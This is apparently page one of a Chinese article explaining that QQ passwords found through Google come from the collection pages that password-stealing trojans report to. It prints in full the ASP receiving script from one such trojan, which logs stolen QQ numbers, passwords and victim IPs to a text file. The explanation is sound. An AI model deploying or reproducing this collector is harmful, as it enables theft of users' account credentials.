前两天看到一篇文章，说的是网民利用谷歌搜索引擎可以搜索到QQ密码，而本人对文中的观点要进行一下纠正。接触过网络安全的人应该都知道，那样搜索到的QQ密码的页面其实就是一些所谓的黑客在配置QQ木马时候所填写的接收QQ密码的页面。QQ木马有两种方式接收盗来的QQ密码，一个是邮箱，一个是空间，而空间接收是最直接也是最保险的，因为有些邮箱是不支持的。而且用网页接收一般是用支持asp的空间，它需要一个接收密码的的脚本。接收到密码后会在网站同目录创建一个.txt文件并将账号密码存进这个文本里。

　　我上网找了个QQ木马，叫金狐QQ大盗，里面就带有一个QQ.asp 我把内容贴出来给大家看看。如下：

<%
strLogFile="2008jhqqxx.txt"
QQNumber=request("QQNumber")
QQPassWord=request("QQPassWord")
QQclub=request("QQclub")
QQip=request("QQip")

if QQNumber="" or QQPassWord="" then
　 response.write "jhQQ"
　 response.end
End If
StrLogText=StrLogText&QQNumber&"----"&QQPassWord&"----会员:"&QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")
StrLogText=StrLogText&")----"&date&" "&time

set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing

response.write "发送成功!"
%>

 

[1] [2] 下一页